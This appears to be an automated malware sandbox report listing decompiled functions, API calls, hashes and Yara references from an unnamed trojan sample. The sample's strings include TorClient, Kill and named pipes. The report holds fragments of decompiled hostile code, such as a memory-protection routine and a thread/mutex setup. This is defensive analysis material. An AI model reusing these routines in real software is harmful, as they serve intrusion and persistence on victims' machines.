String ID: Dec 21 2020
API String ID: 4010158826-582694290
Opcode ID: cb2092006722abb9ec87fca459273d3932698acbcdeb701c75e13a154de82a22
Instruction ID: de961f24d21181715676633834b9c78cf705723c8c97daac0e60efe5723fab23
Opcode Fuzzy Hash: cb2092006722abb9ec87fca459273d3932698acbcdeb701c75e13a154de82a22
Instruction Fuzzy Hash: C0314C31E00219ABDB00DFA8C885BEEB7B9FF49354F1501A9E915FB280D771AA45DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02B7ED95, Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(02B8E8CE,?,00000000,02B8E8CE,00000000,?,00000000,?,?,?,?,02B8E8CE,?,Client32,?,?), ref: 02B7EDBA
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02B7EDD1
HeapFree.KERNEL32(00000000,00000000,?,?,?,02B8E8CE,?,Client32,?,?,?,02B815E7), ref: 02B7EDEC
RegQueryValueExA.KERNELBASE(02B8E8CE,?,00000000,02B8E8CE,00000000,?,?,?,?,02B8E8CE,?,Client32,?,?,?,02B815E7), ref: 02B7EE0B

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateFree
String ID:
API String ID: 4267586637-0
Opcode ID: 8c094b0f4bacec121193039da4b94163a468d22f5066384a43f163a172ee687d
Instruction ID: 43cb9977f358c0a766d34921ba5345e4491b20b9d05dfc81e4b2783e3fc28f20
Opcode Fuzzy Hash: 8c094b0f4bacec121193039da4b94163a468d22f5066384a43f163a172ee687d
Instruction Fuzzy Hash: 66118CB6900118FFCB12DF85DD84DEEBBBCEB89390B104496F811A7110D3719E50DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0040116E, Relevance: 6.1, APIs: 4, Instructions: 61
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040116E() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t24;
				int _t25;
				void* _t29;
				intOrPtr* _t31;
				signed int _t34;
				void* _t36;
				intOrPtr _t37;
				int _t41;

				 *0x404148 =  *0x404148 & 0x00000000;
				_push(0);
				_push(0x404144);
				_push(1);
				_push( *0x404150 + 0x405084);
				 *0x404140 = 0xc; // executed
				L0040178C(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E00401F65( &_v44,  &_v28,  *0x40414c ^ 0xfd7cd1cf) == 0) {
					_t24 = 0xb;
					L7:
					ExitThread(_t24);
				}
				_t25 = lstrlenW( *0x404138);
				_t7 = _t25 + 2; // 0x2
				_t41 = _t25 + _t7;
				_t10 = _t41 + 8; // 0xa
				_t29 = E00401DBD(_t37, _t10,  &_v48,  &_v52); // executed
				if(_t29 == 0) {
					_t36 =  *0x404138;
					_t31 = _v52;
					 *_t31 = 0;
					if(_t36 == 0) {
						 *(_t31 + 4) =  *(_t31 + 4) & 0x00000000;
					} else {
						memcpy(_t31 + 4, _t36, _t41);
					}
				}
				_t24 = E00401252(_v44, _t37); // executed
				goto L7;
			}

0x00401179
0x00401184
0x00401186
0x0040118b
0x00401193
0x00401194
0x0040119e
0x004011a7
0x004011ac
0x004011ca
0x00401229
0x0040122a
0x0040122b
0x0040122b
0x004011d2
0x004011d8
0x004011d8
0x004011e6
0x004011ea
0x004011f1
0x004011f3
0x004011fb
0x004011ff
0x00401205
0x00401217
0x00401207
0x0040120d
0x00401212
0x00401205
0x00401220
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,00404144,00000000), ref: 0040119E
lstrlenW.KERNEL32(?,?,?), ref: 004011D2

Part of subcall function 00401DBD: GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,004011EF,0000000A,?), ref: 00401DCA
Part of subcall function 00401DBD: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401DE0
Part of subcall function 00401DBD: _snwprintf.NTDLL ref: 00401E05
Part of subcall function 00401DBD: CreateFileMappingW.KERNELBASE(000000FF,00404140,00000004,00000000,?,?), ref: 00401E2A
Part of subcall function 00401DBD: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011EF,0000000A), ref: 00401E41
Part of subcall function 00401DBD: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011EF), ref: 00401E76

memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 0040120D
ExitThread.KERNEL32 ref: 0040122B

Memory Dump Source

Source File: 00000001.00000002.448591330.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.448578715.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448616383.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448636811.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.448653832.0000000000406000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlenmemcpy
String ID:
API String ID: 2378523637-0
Opcode ID: 24bfc1bb8f12c880da5c9f38cd5b01c406edc1150a00a5600ef9f06343e23f9f
Instruction ID: c8d93aa21f00936fe0ad512c1b72e9e7e5312e3e5d11c6ee9c926e050797aab0
Opcode Fuzzy Hash: 24bfc1bb8f12c880da5c9f38cd5b01c406edc1150a00a5600ef9f06343e23f9f
Instruction Fuzzy Hash: AB117CB2104201ABD711EFA1DD49F9B77ECAB98308F00093AF641FB1E1E738E5488B59

Uniqueness

Uniqueness Score: -1.00%

Function 02B81F00, Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,02B9E088,00000000,02B7D9F2,?,02B79809,?), ref: 02B81F1F
PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,02B9E088,00000000,02B7D9F2,?,02B79809,?), ref: 02B81F2A
_wcsupr.NTDLL ref: 02B81F37
lstrlenW.KERNEL32(00000000), ref: 02B81F3F

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
String ID:
API String ID: 2533608484-0
Opcode ID: baa7d30bd2c29730c87dc8d05597911ea7d3e837f05cb0476dd6052e9891b41a
Instruction ID: 59e107a78366b6ff3c3a4aba1313df0c801a377c86bd03bd6d9ea03152eb3c49
Opcode Fuzzy Hash: baa7d30bd2c29730c87dc8d05597911ea7d3e837f05cb0476dd6052e9891b41a
Instruction Fuzzy Hash: 59F0E9316461112ED3127A79ADC8A3FAA6DEFC6BD4F10087AF90DD3140CF64CC11D964

Uniqueness

Uniqueness Score: -1.00%

Function 02B8046A, Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02B80489

Part of subcall function 02B8B674: RtlEnterCriticalSection.NTDLL(00000000), ref: 02B8B680
Part of subcall function 02B8B674: CloseHandle.KERNEL32(?), ref: 02B8B68E
Part of subcall function 02B8B674: RtlLeaveCriticalSection.NTDLL(00000000), ref: 02B8B6AA

FindCloseChangeNotification.KERNELBASE(?), ref: 02B80497
InterlockedDecrement.KERNEL32(02B9DF5C), ref: 02B804A6

Part of subcall function 02B925A3: SetEvent.KERNEL32(000003CC,02B804C1), ref: 02B925AD
Part of subcall function 02B925A3: CloseHandle.KERNEL32(000003CC), ref: 02B925C2
Part of subcall function 02B925A3: HeapDestroy.KERNELBASE(056F0000), ref: 02B925D2

RtlExitUserThread.NTDLL(00000000), ref: 02B804C2

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Close$CriticalHandleSection$ChangeDecrementDestroyEnterEventExitFindHeapInterlockedLeaveMultipleNotificationObjectsThreadUserWait
String ID:
API String ID: 2993087875-0
Opcode ID: c97a8f77883248f10ef4f1f107ad1360035a21ec60c56beae21cd0225b9e393b
Instruction ID: 49bd1e6284f3c54a619fac0b2c95b296065cabe95d2c9c57d3ecf20c05ec0198
Opcode Fuzzy Hash: c97a8f77883248f10ef4f1f107ad1360035a21ec60c56beae21cd0225b9e393b
Instruction Fuzzy Hash: 46F0C230A81200BBDB41BB78DD0AB6A3B78EF467B0B140799F92D932C0DB749900CB75

Uniqueness

Uniqueness Score: -1.00%

Function 02B8CF2A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54memorytimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,?,?,63699BC3,00000000,02B87CE2,?), ref: 02B8CF67
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,02B87CE2,?,?), ref: 02B8CFC8

Strings

{&/, xrefs: 02B8CF76

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Time$FileFreeHeapSystem
String ID: {&/
API String ID: 892271797-314889142
Opcode ID: fabe3e583a4d9ec8a96d49514eedc7477735a24333be294f77687dcff1acd232
Instruction ID: c09160212a404ecd330db2792e8fb448b773ffd0871011c2954a1fb22f7afb74
Opcode Fuzzy Hash: fabe3e583a4d9ec8a96d49514eedc7477735a24333be294f77687dcff1acd232
Instruction Fuzzy Hash: 4A1125B1D00219EBDB04EBA0DA45B9EBBBDEB04345F1005A3E906E3140D730EA54DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00401CCA, Relevance: 4.6, APIs: 3, Instructions: 69
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401CCA(void* __eax, long __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				int _t33;
				signed int _t36;
				long _t41;
				void* _t50;
				void* _t51;
				signed int _t54;

				_t41 = __edx;
				_v12 = _v12 & 0x00000000;
				_t36 =  *(__eax + 6) & 0x0000ffff;
				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v20 = _t36;
				VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
				_v8 = _v8 & 0x00000000;
				if(_t36 <= 0) {
					L11:
					return _v12;
				}
				_t51 = _t50 + 0x24;
				while(1) {
					_t54 = _v12;
					if(_t54 != 0) {
						goto L11;
					}
					asm("bt dword [esi], 0x1d");
					if(_t54 >= 0) {
						asm("bt dword [esi], 0x1e");
						if(__eflags >= 0) {
							_t41 = 4;
						} else {
							asm("bt dword [esi], 0x1f");
							asm("sbb edx, edx");
							_t41 = ( ~(_t41 & 0xffffff00 | __eflags > 0x00000000) & 0x00000002) + 2;
						}
					} else {
						asm("bt dword [esi], 0x1f");
						asm("sbb edx, edx");
						_t41 = ( ~(_t41 & 0xffffff00 | _t54 > 0x00000000) & 0x00000020) + 0x20;
					}
					_t33 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t41,  &_v16); // executed
					if(_t33 == 0) {
						_v12 = GetLastError();
					}
					_t51 = _t51 + 0x28;
					_v8 = _v8 + 1;
					if(_v8 < _v20) {
						continue;
					} else {
						goto L11;
					}
				}
				goto L11;
			}

0x00401cca
0x00401cd4
0x00401cd9
0x00401ce5
0x00401cf2
0x00401cf8
0x00401cfa
0x00401d00
0x00401d6c
0x00401d73
0x00401d73
0x00401d02
0x00401d05
0x00401d05
0x00401d09
0x00000000
0x00000000
0x00401d0b
0x00401d0f
0x00401d24
0x00401d28
0x00401d3e
0x00401d2a
0x00401d2a
0x00401d33
0x00401d39
0x00401d39
0x00401d11
0x00401d11
0x00401d1a
0x00401d1f
0x00401d1f
0x00401d4f
0x00401d53
0x00401d5b
0x00401d5b
0x00401d5e
0x00401d61
0x00401d6a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401d6a
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,?,00000002,00000000,?,00000002), ref: 00401CF8
VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 00401D4F
GetLastError.KERNEL32(?,?), ref: 00401D55

Memory Dump Source

Source File: 00000001.00000002.448591330.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.448578715.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448616383.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448636811.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.448653832.0000000000406000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 8a0fc57b8691e89edc14ffbdf9d404588e44e58606b401eef99887fdddbf9a56
Instruction ID: c45b46aac259a1327c26c629ca56359e809513a8642c7b268885a5ae6b006622
Opcode Fuzzy Hash: 8a0fc57b8691e89edc14ffbdf9d404588e44e58606b401eef99887fdddbf9a56
Instruction Fuzzy Hash: AF21D276900109EFDB208F99DC80EAEF7B9FF50315F20856AE54067251D338AA8ACB14

Uniqueness

Uniqueness Score: -1.00%

Function 02B7810A, Relevance: 4.5, APIs: 3, Instructions: 39registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,05AE8900,?), ref: 02B7811F
RegOpenKeyA.ADVAPI32(80000001,05AE8900,?), ref: 02B7812C
lstrlen.KERNEL32(05AE8900,00000000,00000000,?,?,02B879A9,00000000,?), ref: 02B7814D

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CreateOpenlstrlen
String ID:
API String ID: 2865187142-0
Opcode ID: eb2f4825efb9d152828cee6e19cdac00df97e9a6116531554a205dc13fe89f41
Instruction ID: 7255270a779d065e3e6a842e675b7db493ffed57e46e72b885fd98326d714aac
Opcode Fuzzy Hash: eb2f4825efb9d152828cee6e19cdac00df97e9a6116531554a205dc13fe89f41
Instruction Fuzzy Hash: BEF06D75504208BFEB10AF51CC88EAB7BBCEB4A3A4F008056FD4686240D7709990CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B833D3, Relevance: 4.5, APIs: 3, Instructions: 33COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,02B74655,00000000), ref: 02B833EE
IsWow64Process.KERNEL32(?,?,?,?,?,?,02B74655,00000000), ref: 02B833FF
FindCloseChangeNotification.KERNELBASE(?,?,?,?,02B74655,00000000), ref: 02B83412

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Process$ChangeCloseFindNotificationOpenWow64
String ID:
API String ID: 3805842350-0
Opcode ID: eb8d80ed838878eb608b53ca3c79a5956fdff56c78b38358ecd7d864055749a0
Instruction ID: 14f127ee528cedf17a41c74b7771df46e8e520c0cd22ab4cda3a30b52d65ee4b
Opcode Fuzzy Hash: eb8d80ed838878eb608b53ca3c79a5956fdff56c78b38358ecd7d864055749a0
Instruction Fuzzy Hash: 33F08271900514FFC712AF55CD098DEBBFCEFC6A95B1981A5F908A3100E7318B41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B925A3, Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(000003CC,02B804C1), ref: 02B925AD

Part of subcall function 02B7A87A: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,02B925B8), ref: 02B7A8A3
Part of subcall function 02B7A87A: RtlDeleteCriticalSection.NTDLL(02B9E220), ref: 02B7A8D6
Part of subcall function 02B7A87A: RtlDeleteCriticalSection.NTDLL(02B9E240), ref: 02B7A8DD
Part of subcall function 02B7A87A: CloseHandle.KERNEL32(?,?,02B925B8), ref: 02B7A90C
Part of subcall function 02B7A87A: ReleaseMutex.KERNEL32(000002C0,00000000,?,?,?,02B925B8), ref: 02B7A91D
Part of subcall function 02B7A87A: CloseHandle.KERNEL32(?,?,02B925B8), ref: 02B7A929
Part of subcall function 02B7A87A: ResetEvent.KERNEL32(00000000,00000000,?,?,?,02B925B8), ref: 02B7A935
Part of subcall function 02B7A87A: CloseHandle.KERNEL32(?,?,02B925B8), ref: 02B7A941
Part of subcall function 02B7A87A: SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,02B925B8), ref: 02B7A947
Part of subcall function 02B7A87A: SleepEx.KERNEL32(00000064,00000001,?,?,02B925B8), ref: 02B7A95B
Part of subcall function 02B7A87A: HeapFree.KERNEL32(00000000,00000000,?,?,02B925B8), ref: 02B7A97E
Part of subcall function 02B7A87A: RtlRemoveVectoredExceptionHandler.NTDLL(02BB05B8), ref: 02B7A9B7

CloseHandle.KERNEL32(000003CC), ref: 02B925C2
HeapDestroy.KERNELBASE(056F0000), ref: 02B925D2

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CloseHandle$Sleep$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
String ID:
API String ID: 1636361345-0
Opcode ID: f7fabcc3c20424b5abf33bad3f6d2591dd59cd25212f57a023adce55cc6dca02
Instruction ID: 9bfd481f177c9f75c5a382faae3dcfd4437a828af2375a118da2051205d05e61
Opcode Fuzzy Hash: f7fabcc3c20424b5abf33bad3f6d2591dd59cd25212f57a023adce55cc6dca02
Instruction Fuzzy Hash: C9E0E270E80201ABEE40AB71AAAEB1637A9AB002823080860FC08C3190EB34D4A19A70

Uniqueness

Uniqueness Score: -1.00%

Function 02B79F4D, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B8672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,02B71CDF,00000000,00000000,?,?,00000000,?,?,?,02B71CDF,TorClient), ref: 02B86765
Part of subcall function 02B8672D: RtlAllocateHeap.NTDLL(00000000,02B71CDF), ref: 02B86779
Part of subcall function 02B8672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,02B71CDF,?,?,?,02B71CDF,TorClient,?,?), ref: 02B86793
Part of subcall function 02B8672D: RegCloseKey.KERNELBASE(?,?,?,?,02B71CDF,TorClient,?,?), ref: 02B867BD

HeapFree.KERNEL32(00000000,?,?,Ini,?,?,76D7F710,00000000,00000000,?,?,?,02B958BA,?), ref: 02B79FDB

Part of subcall function 02B85B0D: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,02B919D8,00000000,00000001,-00000007,?,00000000), ref: 02B85B2F

Strings

Ini, xrefs: 02B79F5D

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreememcpy
String ID: Ini
API String ID: 1301464996-1327165576
Opcode ID: d566800582631a25d8789786e7945cfc11eca32a0a436533c5beb4af9e96fd16
Instruction ID: 983a5008f3c6381670882a085776f70180729d9c59d3b7a0dcb6da98b718906b
Opcode Fuzzy Hash: d566800582631a25d8789786e7945cfc11eca32a0a436533c5beb4af9e96fd16
Instruction Fuzzy Hash: 1A11CE75A00605AFDB14EA45DD80FFE7BA9EB4A350F1004B6FA12EB280D770AD10DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B82A2E, Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00000000,00000003,00000000,00000000), ref: 02B82A5E
GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000003,00000000), ref: 02B82AA5

Part of subcall function 02B84FB0: HeapFree.KERNEL32(00000000,00000200,02B86EB2,00000000,00000100,00000200), ref: 02B84FBC

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
String ID:
API String ID: 552344955-0
Opcode ID: 8f08d51b09feb04822fcb63742c20244d45abb47c83b30459219f4dc35ef98a9
Instruction ID: 074d64f01b3e720f658fe93b2a268a267538fde059e7d76716c6e69108191362
Opcode Fuzzy Hash: 8f08d51b09feb04822fcb63742c20244d45abb47c83b30459219f4dc35ef98a9
Instruction Fuzzy Hash: ED11E971D00209FBDB21EFA8C844B9EB7F9EF95794F104099E82893200EB748A40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02B864FD, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B8672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,02B71CDF,00000000,00000000,?,?,00000000,?,?,?,02B71CDF,TorClient), ref: 02B86765
Part of subcall function 02B8672D: RtlAllocateHeap.NTDLL(00000000,02B71CDF), ref: 02B86779
Part of subcall function 02B8672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,02B71CDF,?,?,?,02B71CDF,TorClient,?,?), ref: 02B86793
Part of subcall function 02B8672D: RegCloseKey.KERNELBASE(?,?,?,?,02B71CDF,TorClient,?,?), ref: 02B867BD

HeapFree.KERNEL32(00000000,00000000,00000000,1795F247,Kill,00000000,?,?,?,00000000,02B87E8C,02B8046A,00000000,00000000), ref: 02B86568

Part of subcall function 02B780B6: StrChrA.SHLWAPI(?,0000002E,?,?,?,00000000,02B76281,00000000), ref: 02B780C8
Part of subcall function 02B780B6: StrChrA.SHLWAPI(?,00000020,?,?,00000000,02B76281,00000000), ref: 02B780D7

Part of subcall function 02B7A7B1: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,76D7F5B0,02B87D3D,61636F4C,00000001,?,?), ref: 02B7A7D7
Part of subcall function 02B7A7B1: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02B7A7E3
Part of subcall function 02B7A7B1: GetModuleHandleA.KERNEL32(KERNEL32.DLL,ExitProcess,?,00000000,00000000), ref: 02B7A7FA
Part of subcall function 02B7A7B1: GetProcAddress.KERNEL32(00000000), ref: 02B7A801
Part of subcall function 02B7A7B1: Thread32First.KERNEL32(?,0000001C), ref: 02B7A811
Part of subcall function 02B7A7B1: CloseHandle.KERNEL32(?), ref: 02B7A859

Strings

Kill, xrefs: 02B8650A

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
String ID: Kill
API String ID: 2627809124-2803628375
Opcode ID: 55ab723270870ff57d53505135d1cd7e3a6a912c2364df1d4f655479487e4b00
Instruction ID: a82a61fb522134ee64bb77f685aea009e149d3fbf610ad7aeb9e1b125ddf7ae4
Opcode Fuzzy Hash: 55ab723270870ff57d53505135d1cd7e3a6a912c2364df1d4f655479487e4b00
Instruction Fuzzy Hash: 9001A4B5A40208FFDF11EBA5DE84D9FBBFEEB01294B0004A5F901E3110E671AE10DA60

Uniqueness

Uniqueness Score: -1.00%

Function 02B8CE39, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B8672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,02B71CDF,00000000,00000000,?,?,00000000,?,?,?,02B71CDF,TorClient), ref: 02B86765
Part of subcall function 02B8672D: RtlAllocateHeap.NTDLL(00000000,02B71CDF), ref: 02B86779
Part of subcall function 02B8672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,02B71CDF,?,?,?,02B71CDF,TorClient,?,?), ref: 02B86793
Part of subcall function 02B8672D: RegCloseKey.KERNELBASE(?,?,?,?,02B71CDF,TorClient,?,?), ref: 02B867BD

HeapFree.KERNEL32(00000000,00000000,00000000,Scr,00000000,?,?,?,00000000,02B87E87,02B8046A,00000000,00000000), ref: 02B8CEAB

Part of subcall function 02B780B6: StrChrA.SHLWAPI(?,0000002E,?,?,?,00000000,02B76281,00000000), ref: 02B780C8
Part of subcall function 02B780B6: StrChrA.SHLWAPI(?,00000020,?,?,00000000,02B76281,00000000), ref: 02B780D7

Part of subcall function 02B794B4: lstrlen.KERNEL32(?,00000000,00000000,76D25520,?,?,?,02B71647,0000010D,00000000,00000000), ref: 02B794E4
Part of subcall function 02B794B4: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 02B794FA
Part of subcall function 02B794B4: memcpy.NTDLL(00000010,?,00000000,?,?,?,02B71647,0000010D), ref: 02B79530
Part of subcall function 02B794B4: memcpy.NTDLL(00000010,00000000,02B71647,?,?,?,02B71647), ref: 02B7954B
Part of subcall function 02B794B4: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 02B79569
Part of subcall function 02B794B4: GetLastError.KERNEL32(?,?,?,02B71647), ref: 02B79573
Part of subcall function 02B794B4: HeapFree.KERNEL32(00000000,00000000,?,?,?,02B71647), ref: 02B79599

Strings

Scr, xrefs: 02B8CE46

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
String ID: Scr
API String ID: 730886825-1633706383
Opcode ID: 661ca3874f035bd8e5e944f4490986262597a6de9682c4ebc8f2475e28e6d33c
Instruction ID: 1d49ac107b4a1a7d186e39ddc1cebb3e7ad6479439034297e9c4330682c33566
Opcode Fuzzy Hash: 661ca3874f035bd8e5e944f4490986262597a6de9682c4ebc8f2475e28e6d33c
Instruction Fuzzy Hash: 7E018675940204FAEF21E791DD09F9F7FBEEB05754F0444A6F905A3190D7B0AA10DA61

Uniqueness

Uniqueness Score: -1.00%

Function 02B79882, Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(02B9E240), ref: 02B7988C
RtlLeaveCriticalSection.NTDLL(02B9E240), ref: 02B798C8

Part of subcall function 02B7EC30: lstrlen.KERNEL32(?,?,00000000,?,02B76222,02B9D4E4,?,?,00000004,00000000,?,00000000,02B7B275,?,?), ref: 02B7EC7D
Part of subcall function 02B7EC30: VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,02B76222,02B9D4E4,?,?,00000004,00000000,?,00000000,02B7B275), ref: 02B7EC8F
Part of subcall function 02B7EC30: lstrcpy.KERNEL32(00000000,?), ref: 02B7EC9E
Part of subcall function 02B7EC30: VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,02B76222,02B9D4E4,?,?,00000004,00000000,?,00000000,02B7B275), ref: 02B7ECAF

Part of subcall function 02B84FB0: HeapFree.KERNEL32(00000000,00000200,02B86EB2,00000000,00000100,00000200), ref: 02B84FBC

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
String ID:
API String ID: 1872894792-0
Opcode ID: 792d354ec48dfe93ddb2138e887b20e001223e110d538da0d14a5f60d77e5ef2
Instruction ID: eaf10e1e82af3e75bf6b5058f5f967d7adf2c7226ace687476c0cf53ec06ceca
Opcode Fuzzy Hash: 792d354ec48dfe93ddb2138e887b20e001223e110d538da0d14a5f60d77e5ef2
Instruction Fuzzy Hash: 6BF0EC366012149F9620AF18D584C36F7A8EF4665030546EBE55553311C7629C11CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 02B81884, Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(02B9DF5C), ref: 02B81899

Part of subcall function 02B7A027: GetSystemTimeAsFileTime.KERNEL32(?), ref: 02B7A052
Part of subcall function 02B7A027: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 02B7A05F
Part of subcall function 02B7A027: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 02B7A0EB
Part of subcall function 02B7A027: GetModuleHandleA.KERNEL32(00000000), ref: 02B7A0F6
Part of subcall function 02B7A027: RtlImageNtHeader.NTDLL(00000000), ref: 02B7A0FF
Part of subcall function 02B7A027: RtlExitUserThread.NTDLL(00000000), ref: 02B7A114

InterlockedDecrement.KERNEL32(02B9DF5C), ref: 02B818BD

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
String ID:
API String ID: 1011034841-0
Opcode ID: 064b318b35b5f923f187939a8e95832bf64cc5d41409cda42c04da043465b7ac
Instruction ID: 3d528efc984ef8583f1f6721ac9e384612b13455e7d9986dfa741df9b5cf9329
